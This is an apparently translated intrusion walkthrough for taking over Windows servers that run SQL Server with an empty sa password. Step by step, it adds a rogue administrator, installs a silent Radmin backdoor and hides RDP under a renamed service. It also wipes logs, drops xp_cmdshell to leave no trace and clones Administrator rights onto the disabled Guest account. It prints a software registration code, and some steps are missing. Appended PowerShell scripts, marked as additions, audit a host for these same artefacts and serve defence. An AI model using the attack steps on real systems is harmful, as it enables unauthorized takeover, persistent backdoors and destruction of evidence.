Tools: WinNTAutoAttack (automatic attacker; sweeps for vulnerabilities); SqlTools (connector for SQL Server instances with a null sa password); Radmin Shadow 3.0 Chinese version (remote control program; Radmin registration code:
08us9a95i+lka9nbolxqv0v8xqddvkgcnctpn2wv11isqocvua
6a5kkzrhc5gvmiybwomk6rnwoj8myy8lxrfi23); SC.exe, Port.bat, Query.exe, Quser.exe (hide the 3389 service so the administrator does not discover the program); CleanIISLog.exe (clears IIS logs); 3389.exe (enables the 3389 terminal service); Psu.exe (used for logging in with the disabled Guest account); Mstsc.exe (Remote Desktop Connection program).
One. Sweep for SA weak passwords (automatic attacker)
Two. Create a user through the SqlTools connection
net start telnet
(starts the Telnet service)
net user Mint Mint /add
(adds the user Mint with password Mint)
net localgroup Administrators Mint /add
(promotes the Mint account to Administrator)
Three. Upload the backdoor program RAD.EXE (a self-extracting package of the Radmin server)
Making RAD.EXE:
1. From the Radmin installation directory take AdmDll.dll, raddrv.dll and r_server.exe;
2. Set up the server locally (it must be generated): set the password -->> set the connection port (default 4489) -->> build;
3. Export the registry key HKEY_LOCAL_MACHINE\SYSTEM\Radmin to 1.reg;
4. Write a batch file named U.bat:
@echo off
net stop r_server
5. Write a second batch file, R.bat, whose content is:
Self-extractor setup: run after extraction: R.bat; run before extraction: U.bat
-->> Mode
Silent mode: hide all; overwrite: overwrite all files
-->> OK -->> OK
Build completed.
Four. Connect with the Radmin client
Upload the files to C:\Winnt (on XP the directory is C:\Windows):
Port.bat (on XP, change Winnt inside it to Windows)
Query.exe, Quser.exe
SC.exe
CleanIISLog.exe
3389.exe
Psu.exe
It is best to also upload a reverse-connection Radmin backdoor through Telnet.
Run C:\winnt\3389.exe and reboot the compromised machine (the "broiler").
Five. After the reboot, connect with Remote Desktop
Sometimes there is a problem: logging in over 3389 you find that the logon sessions are full. Do not worry; we kick one out.
Telnet to the other IP and find that NTLM authentication is required. On our own computer, set up an account Mint with password Mint as administrator.
Find C:\winnt\system32\cmd.exe and create a shortcut to it on the desktop. Modify the CMD shortcut properties to allow running as another user. Run the cmd.exe shortcut from the desktop, enter the account Mint with password Mint, then telnet to the other IP; you land directly on the other machine.
Use the command:
C:\> query user (shows the other side's current terminal logon status)
Run the command:
C:\> logoff 1 (kicks off an administrator)
Check again with C:\> query user (this is why 1.bat is not used immediately).
Six. After connecting, run under CMD:
C:\winnt\log . <your own IP> (wipes your traces from the logs)
C:\winnt\1.bat (deletes and overwrites the file that shows the currently online users)
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]')
    and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
Press F5 (run), close and exit SQL Server, then log in once more using SQL Server authentication and exit (this is so that no record is left).
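As an added defensive check (not part of the original write-up), the following PowerShell script audits a SQL Server instance for the two conditions the steps above depend on: logins with an empty password (the "sa null password" the sweep looks for) and the state of xp_cmdshell. It uses the .NET System.Data.SqlClient provider and the documented PWDCOMPARE function; the instance name is an assumed placeholder, and the caller needs a login that can read sys.sql_logins.

```powershell
# Added example, not from the original page: audit a SQL Server instance for
# empty-password logins and for the xp_cmdshell state. Requires a login able to
# read sys.sql_logins (sysadmin or CONTROL SERVER). The instance is a placeholder.
param(
    [string]$Instance = 'localhost\SQLEXPRESS'   # assumption: replace with the instance to audit
)

Add-Type -AssemblyName System.Data   # System.Data.SqlClient provider

function Invoke-AuditQuery {
    param([string]$ConnectionString, [string]$Query)
    $conn = New-Object System.Data.SqlClient.SqlConnection $ConnectionString
    $conn.Open()
    try {
        $cmd = $conn.CreateCommand()
        $cmd.CommandText = $Query
        $table = New-Object System.Data.DataTable
        $table.Load($cmd.ExecuteReader())
        return ,$table.Rows
    } finally {
        $conn.Close()
    }
}

$cs = "Server=$Instance;Integrated Security=SSPI;TrustServerCertificate=True"

# 1. SQL logins with an empty password. PWDCOMPARE checks a clear-text password
#    against the stored hash, so the empty string finds the "sa null password" case.
$emptyPassword = Invoke-AuditQuery -ConnectionString $cs -Query @"
SELECT name, is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1
"@

# 2. xp_cmdshell: the configuration option, plus whether the extended procedure
#    object still exists in master. The write-up drops the procedure to leave no
#    trace, so a missing object on a server that should have it is itself a signal.
$cmdshell = Invoke-AuditQuery -ConnectionString $cs -Query @"
SELECT c.value_in_use AS enabled,
       (SELECT COUNT(*) FROM master.sys.all_objects WHERE name = 'xp_cmdshell') AS present
FROM sys.configurations c
WHERE c.name = 'xp_cmdshell'
"@

$findings = @()
foreach ($login in $emptyPassword) {
    $state = if ($login.is_disabled) { 'disabled' } else { 'ENABLED' }
    $findings += "login '$($login.name)' has an empty password ($state)"
}
foreach ($row in $cmdshell) {
    if ($row.enabled -eq 1) { $findings += 'xp_cmdshell is enabled' }
    if ($row.present -eq 0) { $findings += 'xp_cmdshell object is missing from master (dropped?)' }
}
if ($findings.Count -eq 0) { Write-Output 'No findings.' }
else { $findings | ForEach-Object { Write-Output "FINDING: $_" } }
```

Run it as `.\Audit-SqlExposure.ps1 -Instance 'host\instance'` with Windows authentication; the empty-password query is the quickest way to confirm whether an instance would have fallen to the sweep described in step One.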
Eight. Change the 3389 port and service name
To modify the server-side port setting, there are two places in the registry to change.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp], PortNumber value: the default is 3389; select decimal and change it to the desired port, such as 1314.
The second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp], PortNumber value: the default is 3389; select decimal and change it to the desired port, such as 1314.
The system must be rebooted before the new port can be used for the connection. (No hurry: change the service name first, then reboot.)
The key value is in the Mm.reg file. Edit Mm.reg and replace TermService with Alerter (the error-alert service; other services are fine too). Then, on the tenth line, "Description"= (this is the service description: change it to the description of the service you chose, here "Notifies selected users and computers of administrative alerts"), and on the eleventh line, "DisplayName"= (this is the service name: change it to the name of the service you chose, here Alerter). Save, then import the file into the registry. Now run services.msc (you can type this command under CMD) to open the Service Manager and stop the Alerter service first.
Then, under CMD:
cd c:\winnt\system32
copy termsrv.exe service.exe
(here termsrv.exe is copied to a file name resembling the Alerter service file)
cd c:\winnt
sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe
(this is the newly redirected Alerter service file; the service name is case-sensitive, with the "A" capitalized)
Nine. After the cleanup (clearing the injection directly is better), use Radmin to reboot the compromised machine.
Ten. Log in with the disabled [Guest] account and delete the account you created at the start.
The PID value: right-click a blank area of the taskbar -->> Task Manager -->> Processes; the number next to winlogon.exe is the PID.
For example: psu -p regedit -i 157
The method for elevating the Guest account to administrator rights:
1. Find the type value of HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator. Under HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ find the key with that type value and copy its value named F over the corresponding type value of Guest (found the same way).
Export Guest's configuration (that is, export the data of HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Guest and its corresponding type value), then delete Guest's configuration.
2. View the list of accounts in Computer Management; this may give the error [unable to find an account] (skip this step).
3. Import Guest's configuration (the two .reg files) back into the registry.
4. Change the Guest password and disable the Guest account at the command line [this must be done at the command line]:
net user guest ****  [change the password]
net user guest /active:yes
net user guest /active:no  [disable Guest at the command line]
5. Test that the disabled Guest account is usable.
6. After logging in as Guest, delete the account you created yourself:
net user Mint /del
The whole process is over.
Finally, it is best to change the Radmin service as well; leaving more back doors gives more ways in, hehe. The machine has really become your broiler.
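From the defender's side, the artefacts the steps above leave behind (a non-default RDP PortNumber in both registry keys, a second service running a renamed copy of the Terminal Services binary, a Guest account whose SAM data was overwritten with Administrator's) can all be audited from one PowerShell script. The script below is an added example, not part of the original write-up. The registry paths are the ones the write-up names; the SAM F-value layout (the RID repeated at offset 0x30) is an assumption taken from the commonly published SAM format, and the SAM section only works when the script runs as SYSTEM, because HKLM\SAM is not readable by Administrators.

```powershell
# Added example, not from the original write-up: audit a Windows host for the
# persistence artefacts described above. Run elevated; the SAM check additionally
# needs SYSTEM (e.g. psexec -s), since HKLM\SAM is not readable by Administrators.
# The F-value layout (RID at offset 0x30) is assumed from the published SAM format.

function Get-RdpPortFindings {
    # Both PortNumber values are changed in the write-up; flag non-3389 or disagreement.
    $keys = @(
        'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp',
        'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    )
    $findings = @()
    $ports = @()
    foreach ($k in $keys) {
        $p = (Get-ItemProperty -Path $k -Name PortNumber -ErrorAction SilentlyContinue).PortNumber
        $ports += $p
        if ($p -ne 3389) { $findings += "RDP PortNumber is $p at $k" }
    }
    if (($ports | Select-Object -Unique).Count -gt 1) { $findings += 'RDP PortNumber values disagree between the two keys' }
    return $findings
}

function Get-ServiceBinaryFindings {
    # The write-up copies termsrv.exe under a new name and points another service
    # (Alerter) at the copy. Hash the genuine Terminal Services image (termsrv.exe on
    # Windows 2000/2003, termsrv.dll on later versions) and flag any other service
    # whose executable has the same hash. Path parsing is a simple heuristic.
    $sys32 = Join-Path $env:SystemRoot 'System32'
    $refHashes = foreach ($n in 'termsrv.exe', 'termsrv.dll') {
        $f = Join-Path $sys32 $n
        if (Test-Path -LiteralPath $f) { (Get-FileHash -LiteralPath $f -Algorithm SHA256).Hash }
    }
    $findings = @()
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName -or $svc.Name -eq 'TermService') { continue }
        # Strip quotes and arguments to recover the executable path.
        $exe = if ($svc.PathName.StartsWith('"')) { $svc.PathName.Split('"')[1] } else { $svc.PathName.Split(' ')[0] }
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        $h = (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash
        if ($refHashes -contains $h) {
            $findings += "Service $($svc.Name) ('$($svc.DisplayName)') runs a copy of the Terminal Services binary: $exe"
        }
    }
    return $findings
}

function Get-SamCloneFindings {
    # Each key under ...\Users is named by the account RID in hex, and the binary F
    # value repeats the RID at offset 0x30 (assumed layout). Copying Administrator's
    # F value (RID 500) into the Guest key (RID 501) therefore leaves a mismatch.
    $base = 'HKLM:\SAM\SAM\Domains\Account\Users'
    if (-not (Test-Path -Path $base)) {
        return @('HKLM\SAM not readable: rerun as SYSTEM to check for cloned accounts')
    }
    $findings = @()
    foreach ($key in Get-ChildItem -Path $base) {
        if ($key.PSChildName -eq 'Names') { continue }
        $f = (Get-ItemProperty -Path $key.PSPath -Name F -ErrorAction SilentlyContinue).F
        if (-not $f -or $f.Length -lt 0x34) { continue }
        $keyRid = [Convert]::ToUInt32($key.PSChildName, 16)
        $embeddedRid = [BitConverter]::ToUInt32($f, 0x30)
        if ($keyRid -ne $embeddedRid) {
            $findings += ('Account key {0:X8} holds F data of RID {1}: possible cloned account' -f $keyRid, $embeddedRid)
        }
    }
    return $findings
}

function Get-GuestFindings {
    # Guest should stay disabled and out of Administrators.
    $findings = @()
    $guest = Get-LocalUser -Name 'Guest' -ErrorAction SilentlyContinue
    if ($guest -and $guest.Enabled) { $findings += 'Guest account is enabled' }
    $admins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue
    foreach ($m in $admins) { if ($m.Name -match '\\Guest$') { $findings += 'Guest is a member of Administrators' } }
    return $findings
}

$all = @(Get-RdpPortFindings) + @(Get-ServiceBinaryFindings) + @(Get-SamCloneFindings) + @(Get-GuestFindings)
if ($all.Count -eq 0) { Write-Output 'No findings.' } else { $all | ForEach-Object { Write-Output "FINDING: $_" } }
```

The hash comparison is deliberately name-agnostic: the write-up picks Alerter and service.exe, but any service pointed at a renamed copy of the Terminal Services image is caught the same way. The cloned-Guest check is the one that matters most, because a cloned Guest stays disabled and absent from the Administrators group, so group-membership audits alone do not reveal it.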